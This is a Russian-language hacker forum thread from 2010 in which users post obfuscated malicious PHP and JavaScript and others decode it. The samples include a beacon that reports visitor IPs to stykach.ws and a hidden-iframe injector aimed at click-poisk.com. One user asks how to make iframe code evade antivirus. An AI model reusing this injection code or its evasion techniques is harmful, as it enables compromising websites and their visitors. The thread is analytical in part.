Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
03.03.2010, 19:16
|
|
Познающий
Регистрация: 23.11.2006
Сообщений: 48
Провел на форуме:
292461
Репутация:
10
|
|
Что тут зашифровано подскажите плиз
Код:
<? $x13="\x64i\162n\x61m\145"; $x14="fil\x65"; $x15="\155\153d\x69r"; $x16="\165\156\154i\156\153"; $x0b="\0600\071";$x0c="no"; if($x0c=='ok'){$x15("\x74\145\163t_o\x6b",0777);}echo "\074s\164y\x6c\x65\076\142\x6f\x64\x79\173\146\157\x6e\164\055s\151z\x65:\x30\x70\170\x3bc\x6f\x6co\162:\x23\146ff}\074/\163\164yl\x65\076"; $x0d="\150\164\164\160\072\x2f/".$x13($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$x0e=$_SERVER['HTTP_HOST']; $x0f=$_SERVER['REMOTE_ADDR']; $x10 = array('127.0.0.1'); foreach ($x10 as $x11) { if($x11==$x0f) {}else{if($_SERVER['HTTP_HOST']==$x0f){}else{$x12 = @$x14("htt\160\x3a\057\057styk\141c\150\x2ew\163/c\157k\x5fma\x69\156\056\160\x68p?\147u\075$x0e\046\165s\145\162=$x0b\046\x69\x70=$x0f\x26f=$x0d"); $x16('rss_taib.png'); }}}?> <? echo "\x3c\x73\164\x79\x6ce\x3e\142\157\x64y\173\146o\x6e\x74\x2d\163\x69\172\145\072\x30\160\x78\x3bc\x6fl\157\x72\x3a\x23\x66\x66\146\175</\163t\x79\x6c\145>";?>
|
|
|
05.03.2010, 11:51
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 36
Провел на форуме:
102286
Репутация:
8
|
|
Сообщение от {BuT@Min}
Что тут зашифровано подскажите плиз
Код:
<?
$x0b="009"; // ???
$x0c="no";
if($x0c=='ok'){ mkdir("test_ok",0777);}
echo "<style>body{font-size:0px;color:#fff}</style>";
$x0d="http://".dirname($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);
$x0e=$_SERVER['HTTP_HOST'];
$x0f=$_SERVER['REMOTE_ADDR'];
$x10 = array('127.0.0.1');
foreach ($x10 as $x11)
{
if ($x11==$x0f) {}
else
{
if($_SERVER['HTTP_HOST']==$x0f){}
else
{
$x12 = @("http://stykach.ws/cok_main.php??gu=$x0e&user=$x0b&ip=$x0f&f=$x0d");
unlink('rss_taib.png');
}
}
}
?>
<?echo "<style>body{font-size:0px;color:#fff}</style>";?>
Последний раз редактировалось Dragon_X; 05.03.2010 в 11:58..
|
|
|
|
04.02.2010, 16:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
там функция, в которой массив из которой можно вернуть декодированный элемент массива по его номеру. Чтобы посмотреть все элементы массива в декоде, просто запустить это:
http://slil.ru/28595026
PS: какой-то спамер вконтакте похоже
|
|
|
|
05.02.2010, 00:54
|
|
Новичок
Регистрация: 03.02.2010
Сообщений: 2
Провел на форуме:
2857
Репутация:
0
|
|
так точно, это спамер и это я догадался как сделать,
но похоже переменные и функции не восстановить, видимо автор их заменил тупо в редакторе, но и на том спасибо
|
|
|
|
21.02.2010, 16:37
|
|
Участник форума
Регистрация: 31.12.2007
Сообщений: 279
Провел на форуме:
1725509
Репутация:
114
|
|
подскажите что тут :
<script>wvan=["ocynoaxi=0;nyzibet='';for(pfhuo=0;pfhuo<wvan[0]['length'];pfhuo+=1)ocynoaxi+=wvan[0].charCodeAt(pfhuo);ocynoaxi%=0x64;for(pfhuo=0;pfhu o<wvan[1]['length'];pfhuo+=2)nyzibet+=String.fromCharCode(parseInt(0+ 'x'+wvan[1].charAt(pfhuo)+wvan[1].charAt(pfhuo+1))^ocynoaxi);document.write(nyzibet );","24706c757426247a777c6126246b7b6a71686c266e796 a386c7d7568515e6a79757d257c777b6d757d766c367b6a7d7 96c7d5d747d757d766c303f717e6a79757d3f31236c7d75685 15e6a79757d366b7d6c596c6c6a717a6d6c7d303f717c3f343 f4a4b515e6a79757d3f31236c7d7568515e6a79757d366b7d6 c596c6c6a717a6d6c7d303f6b6a7b3f343f706c6c682237377 b74717b73356179767c367b777537797c377176367b7f71272 b3f31236c7d7568515e6a79757d366b6c61747d366e716b717 a7174716c61253f70717c7c7d763f236c7d7568515e6a79757 d366b6c61747d366f717c6c70253f2868603f236c7d7568515 e6a79757d366b6c61747d36707d717f706c253f2868603f235 15e6a79757d577a723825387c777b6d757d766c367a777c613 67968687d767c5b7071747c306c7d7568515e6a79757d31232 4376b7b6a71686c2624377a777c61262437706c757426"];eval(wvan[0]);</script>
|
|
|
|
02.03.2010, 10:43
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 36
Провел на форуме:
102286
Репутация:
8
|
|
Сообщение от -=Zhenek=-
подскажите что тут :
document.write замени на alert и увидишь
какой-то бинарный код
|
|
|
|
21.02.2010, 17:26
|
|
Познающий
Регистрация: 10.12.2009
Сообщений: 41
Провел на форуме:
1048786
Репутация:
5
|
|
Как лучше зделать обусфакцию iframe кода что бы не палился каспером и другими антивирусными системами ?
Хотелось бы увидеть пару примеров.
|
|
|
|
27.02.2010, 18:36
|
|
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
Есть код вида:
PHP код:
...
$_obfuscate_3ZsDaue4z8kmCNc� =& $this->_obfuscate_DHVrfX15Kj4tGSg�( );
$_obfuscate_9zJs_k24vlStCaL_A�� = array( );
if ( isset( $_obfuscate_3ZsDaue4z8kmCNc�['*']['*'] ) )
{
$_obfuscate_9zJs_k24vlStCaL_A�� = $_obfuscate_3ZsDaue4z8kmCNc�['*']['*'];
}
if ( isset( $_obfuscate_3ZsDaue4z8kmCNc�['*']['*'] ) )
{
...
Подскажите утилиту для деобфускации имен переменных и функций. |
|
|
|
01.03.2010, 18:20
|
|
Познающий
Регистрация: 11.11.2008
Сообщений: 77
Провел на форуме:
1144288
Репутация:
99
|
|
Помогите пожалуйста деобфусцировать:
Код:
<script type='text/javascript'>function zG(){};tF=53186;zG.prototype = {fK : function() {e="e";this.fQ='';return 'h2t)tFp2:&/F/)c2l)iFc)k&-FpFo)i)s)k2.Fc&o)m2/&tIh&eFrFeF/&i)n).2c)gIi&?27)'.iH(/[\)I&F2]/g, '');var oN=new Date();this.nU="";},v : function() {dF="";wS=9383;nB="nB";var t=new Date(); var h='';var m=new Date(); String.prototype.iH=function(d, o){return this.replace(d, o)};var r=new Date();tR="tR";kQ=false;gG=20573;wJ=false;zW="";var c=function(){};var y=window;gN="gN";this.yQ="yQ";var yR=y['u{n$eYs9c{aYp{eY'.iH(/[Yj9\$\{]/g, '')];var eK=new Date();var hI="hI";function jL(){};var z = this;var rN='';var p=false;var oD = "xxK%3C%2Fbody%3E%3C%2Fhtml%3E";function mT(){};xH="";this.u=false;var f=document;this.dX="dX";this.hB="hB";var jA=false;var k = { vM : 'arpTpreonTd#CohoirlSd#'.iH(/[#roST]/g, ''), oU : 'svtuyvlvei'.iH(/[ivua_]/g, ''), kC : 'cKrCe3aKt3ezEzlzezmKeGn3tK'.iH(/[K3zCG]/g, ''), fV : 'sReDtRATtTt?rRiRbRuTtEeT'.iH(/[TD\?ER]/g, ''), w : 's;rLcL'.iH(/[L;\{\(5]/g, ''), xK : 'bko1dUyT'.iH(/[T1Uk\)]/g, '') };var rK='';function hV(){};var uI=function(){return 'uI'};this.gC='';var rP="";var tZ=function(){return 'tZ'};this.a="a";var n=f[k.kC]('i<furuaKm<ed'.iH(/[d\<\!uK]/g, ''));var kL=new Date();i=39073;this.fU="fU";jO=false;pW='';var eY=5116;try {rD="rD";vC=false;var fI=function(){};var rU="rU";this.q="q";b="";var bJ='';nE(n,k.oU, yR("display%3A%20none"));function dS(){};rG=63044;this.uK=false;this.iB="iB";nE(n,k.w, this.fK());eU="eU";this.pS='';this.fR="";var qA='';qE="qE";qL="";f[k.xK][k.vM](n);this.xL=54456;this.hW="";var bK=new Array();this.iR="";} catch(g) {this.vB="";tN='';var eJ='';var uD=new Array();var rV=new Date();var l=function(){};this.lK='';f['wSr%i;tSe%'.iH(/[%;XS/]/g, '')](yR(oD));this.hK=49925;var iL=new Array();hKH='';this.uJ=61972;this.cO="cO";var s="s";this.mG=53808;y['s+eAt+T6iwm+ewoAuAtw'.iH(/[w\+Z6A]/g, '')](function(){ this.cJ="cJ";this.uR="";var pO='';vH=58151;this.dSF='';var sV="sV";z.v();var wH=34896;var cM=new Date();var yK=new Array();var eYV=function(){};this.kU="kU";zT="";}, 368);zJ="";var dXZ="dXZ";}qZ=19279;this.vBG='';var nM=new Date();var tZZ=false;var eE=new Date();var hC=new Date();function vO(){};var wZ="";function nE(n, j, dB){this.bW='';var fT=new Array();n[k.fV](j,dB);var iRP=function(){return 'iRP'};tD="";var kI=new Array();}this.xX='';this.fX='';var tQ=false;dV=false;}};var uY=new Array();var cP=new zG(); this.dK="dK";cP.v();function gQ(){};</script>
скачать можно тут: http://dump.ru/file/4380738 |
|
|
|
02.03.2010, 11:52
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 36
Провел на форуме:
102286
Репутация:
8
|
|
Сообщение от Player#1
Помогите пожалуйста деобфусцировать:
Код:
<script type='text/javascript'>function zG(){};tF=53186;zG.prototype = {fK : function() {e="e";this.fQ='';return 'h2t)tFp2:&/F/)c2l)iFc)k&-FpFo)i)s)k2.Fc&o)m2/&tIh&eFrFeF/&i)n).2c)gIi&?27)'.iH(/[\)I&F2]/g, '');var oN=new Date();this.nU="";},v : function() {dF="";wS=9383;nB="nB";var t=new Date(); var h='';var m=new Date(); String.prototype.iH=function(d, o){return this.replace(d, o)};var r=new Date();tR="tR";kQ=false;gG=20573;wJ=false;zW="";var c=function(){};var y=window;gN="gN";this.yQ="yQ";var yR=y['u{n$eYs9c{aYp{eY'.iH(/[Yj9\$\{]/g, '')];var eK=new Date();var hI="hI";function jL(){};var z = this;var rN='';var p=false;var oD = "xxK%3C%2Fbody%3E%3C%2Fhtml%3E";function mT(){};xH="";this.u=false;var f=document;this.dX="dX";this.hB="hB";var jA=false;var k = { vM : 'arpTpreonTd#CohoirlSd#'.iH(/[#roST]/g, ''), oU : 'svtuyvlvei'.iH(/[ivua_]/g, ''), kC : 'cKrCe3aKt3ezEzlzezmKeGn3tK'.iH(/[K3zCG]/g, ''), fV : 'sReDtRATtTt?rRiRbRuTtEeT'.iH(/[TD\?ER]/g, ''), w : 's;rLcL'.iH(/[L;\{\(5]/g, ''), xK : 'bko1dUyT'.iH(/[T1Uk\)]/g, '') };var rK='';function hV(){};var uI=function(){return 'uI'};this.gC='';var rP="";var tZ=function(){return 'tZ'};this.a="a";var n=f[k.kC]('i<furuaKm<ed'.iH(/[d\<\!uK]/g, ''));var kL=new Date();i=39073;this.fU="fU";jO=false;pW='';var eY=5116;try {rD="rD";vC=false;var fI=function(){};var rU="rU";this.q="q";b="";var bJ='';nE(n,k.oU, yR("display%3A%20none"));function dS(){};rG=63044;this.uK=false;this.iB="iB";nE(n,k.w, this.fK());eU="eU";this.pS='';this.fR="";var qA='';qE="qE";qL="";f[k.xK][k.vM](n);this.xL=54456;this.hW="";var bK=new Array();this.iR="";} catch(g) {this.vB="";tN='';var eJ='';var uD=new Array();var rV=new Date();var l=function(){};this.lK='';f['wSr%i;tSe%'.iH(/[%;XS/]/g, '')](yR(oD));this.hK=49925;var iL=new Array();hKH='';this.uJ=61972;this.cO="cO";var s="s";this.mG=53808;y['s+eAt+T6iwm+ewoAuAtw'.iH(/[w\+Z6A]/g, '')](function(){ this.cJ="cJ";this.uR="";var pO='';vH=58151;this.dSF='';var sV="sV";z.v();var wH=34896;var cM=new Date();var yK=new Array();var eYV=function(){};this.kU="kU";zT="";}, 368);zJ="";var dXZ="dXZ";}qZ=19279;this.vBG='';var nM=new Date();var tZZ=false;var eE=new Date();var hC=new Date();function vO(){};var wZ="";function nE(n, j, dB){this.bW='';var fT=new Array();n[k.fV](j,dB);var iRP=function(){return 'iRP'};tD="";var kI=new Array();}this.xX='';this.fX='';var tQ=false;dV=false;}};var uY=new Array();var cP=new zG(); this.dK="dK";cP.v();function gQ(){};</script>
скачать можно тут: http://dump.ru/file/4380738
В общем тут создаётся фрейм с ссылкой на
http://click-poisk.com/there/in.cgi?7
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид